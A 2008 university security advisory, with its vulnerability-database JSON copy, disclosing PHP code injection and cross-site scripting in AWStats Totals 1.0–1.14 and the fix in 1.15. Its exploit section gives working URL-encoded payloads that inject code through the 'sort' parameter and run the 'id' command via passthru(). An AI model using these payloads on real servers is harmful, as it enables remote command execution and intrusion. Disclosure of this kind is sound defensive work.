Emory University UTS Security Advisory EMORY-2008-01
Topic: Multiple Vulnerabilities in AWStats Totals
Original release date: August 26, 2008
SUMMARY
=======
Telartis's AWStats Totals program is vulnerable to command execution
and cross site scripting attacks. A remote attacker could exploit
these vulnerabilities to run arbitrary commands on the system with the
permissions of the web server.
AFFECTED SOFTWARE
=================
* AWStats Totals 1.0 - 1.14
UNAFFECTED
==========
* AWStats Totals >= 1.15
IMPACT
======
A remote attacker could exploit these vulnerabilities to run arbitrary
commands on the web server's host operating system.
DETAILS
=======
AWStats Totals takes three URL parameters, "month," "year," and
"sort," and uses them without checking them for validity.
The program uses the month and year parameters in output it displays
to the user. It will display any HTML or Javascript code included in
these parameters, which the user's browser will then render.
The program uses the sort parameter to build an anonymous PHP function
with the create_function() function.
> function multisort(&$array, $key) {
> $cmp = create_function('$a, $b',
> 'if ($a["'.$key.'"] == $b["'.$key.'"]) return 0;'.
> 'return ($a["'.$key.'"] > $b["'.$key.'"]) ? -1 : 1;');
> usort($array, $cmp);
> }
>
> if ($sort == 'config') sort($rows); else multisort($rows, $sort);
Taking care to match properly the quotes and angle brackets, it is
possible to insert PHP expressions into the code for the function. For
example, to run the phpinfo() function, one might set sort to this
value:
"].phpinfo().$a["
Since any code one injects gets run multiple times, however, it may be
useful to exit the program after a single invocation:
"].phpinfo().exit().$a["
It is also possible to insert PHP expressions through the use of
variable expansion within strings on newer versions of PHP:
{${phpinfo()}}{${exit()}}
SOLUTION
========
Upgrade to AWStats Totals 1.15.
http://www.telartis.nl/xcms/awstats/
EXPLOIT
=======
The following examples require that magic quotes be disabled, but will
work on all versions of PHP.
This example will display phpinfo().
http://host.tld/some/path/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%2eexit%28%29%2e%24a%5b%22
This example will run the "id" command on the target system.
http://host.tld/some/path/awstatstotals.php?sort=%22%5d%2epassthru%28%27id%27%29%2eexit%28%29%2e%24a%5b%22
======
The following examples require a version of PHP which parses function
calls inside strings (5+, some versions of 4?), but will work if magic
quotes are enabled.
This example will display phpinfo().
http://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bphpinfo%28%29%7d%7d%7b%24%7bexit%28%29%7d%7d
This example will run the "id" command on the target system.
http://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
ACKNOWLEDGMENTS
===============
Thanks to Telartis B.V. and Jeroen de Jong for quickly releasing an
updated version and for assisting with this advisory.
DISCLAIMER
==========
The information in this advisory is provided by Emory as a courtesy
and without any representations or warranties. Recipients are
advised to conduct their own investigation and due diligence before
relying on its contents.
REVISION HISTORY
================
2008-08-26 original release
{"id": "SECURITYVULNS:DOC:20412", "bulletinFamily": "software", "title": "Multiple Vulnerabilities in AWStats Totals", "description": "Emory University UTS Security Advisory EMORY-2008-01\r\n\r\nTopic: Multiple Vulnerabilities in AWStats Totals\r\n\r\nOriginal release date: August 26, 2008\r\n\r\nSUMMARY\r\n=======\r\n\r\nTelartis's AWStats Totals program is vulnerable to command execution\r\nand cross site scripting attacks. A remote attacker could exploit\r\nthese vulnerabilities to run arbitrary commands on the system with the\r\npermissions of the web server.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* AWStats Totals 1.0 - 1.14\r\n\r\nUNAFFECTED\r\n==========\r\n\r\n* AWStats Totals >= 1.15\r\n\r\nIMPACT\r\n======\r\n\r\nA remote attacker could exploit these vulnerabilities to run arbitrary\r\ncommands on the web server's host operating system.\r\n\r\nDETAILS\r\n=======\r\n\r\nAWStats Totals takes three URL parameters, "month," "year," and\r\n"sort," and uses them without checking them for validity.\r\n\r\nThe program uses the month and year parameters in output it displays\r\nto the user. It will display any HTML or Javascript code included in\r\nthese parameters, which the user's browser will then render.\r\n\r\nThe program uses the sort parameter to build an anonymous PHP function\r\nwith the create_function() function.\r\n\r\n> function multisort(&$array, $key) {\r\n> $cmp = create_function('$a, $b',\r\n> 'if ($a["'.$key.'"] == $b["'.$key.'"]) return 0;'.\r\n> 'return ($a["'.$key.'"] > $b["'.$key.'"]) ? -1 : 1;');\r\n> usort($array, $cmp);\r\n> }\r\n> \r\n> if ($sort == 'config') sort($rows); else multisort($rows, $sort);\r\n\r\nTaking care to match properly the quotes and angle brackets, it is\r\npossible to insert PHP expressions into the code for the function. For\r\nexample, to run the phpinfo() function, one might set sort to this\r\nvalue:\r\n\r\n"].phpinfo().$a["\r\n\r\nSince any code one injects gets run multiple times, however, it may be\r\nuseful to exit the program after a single invocation:\r\n\r\n"].phpinfo().exit().$a["\r\n\r\nIt is also possible to insert PHP expressions through the use of\r\nvariable expansion within strings on newer versions of PHP:\r\n\r\n{${phpinfo()}}{${exit()}}\r\n\r\nSOLUTION\r\n========\r\n\r\nUpgrade to AWStats Totals 1.15.\r\n\r\nhttp://www.telartis.nl/xcms/awstats/\r\n\r\nEXPLOIT\r\n=======\r\n\r\nThe following examples require that magic quotes be disabled, but will\r\nwork on all versions of PHP.\r\n\r\nThis example will display phpinfo().\r\n\r\nhttp://host.tld/some/path/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%2eexit%28%29%2e%24a%5b%22\r\n\r\nThis example will run the "id" command on the target system.\r\n\r\nhttp://host.tld/some/path/awstatstotals.php?sort=%22%5d%2epassthru%28%27id%27%29%2eexit%28%29%2e%24a%5b%22\r\n\r\n======\r\n\r\nThe following examples require a version of PHP which parses function\r\ncalls inside strings (5+, some versions of 4?), but will work if magic\r\nquotes are enabled.\r\n\r\nThis example will display phpinfo().\r\n\r\nhttp://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bphpinfo%28%29%7d%7d%7b%24%7bexit%28%29%7d%7d\r\n\r\nThis example will run the "id" command on the target system.\r\n\r\nhttp://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nThanks to Telartis B.V. and Jeroen de Jong for quickly releasing an\r\nupdated version and for assisting with this advisory.\r\n\r\nDISCLAIMER\r\n==========\r\n\r\nThe information in this advisory is provided by Emory as a courtesy\r\nand without any representations or warranties. Recipients are\r\nadvised to conduct their own investigation and due diligence before\r\nrelying on its contents.\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2008-08-26 original release", "published": "2008-08-26T00:00:00", "modified": "2008-08-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20412", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:27", "edition": 1, "viewCount": 21, "enchantments": {"score": {"value": 1.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9244"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9244"]}]}, "exploitation": null, "vulnersScore": 1.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645579685, "score": 1659803227}, "_internal": {"score_hash": "2bb523767448e37b9b3c706344911c83"}}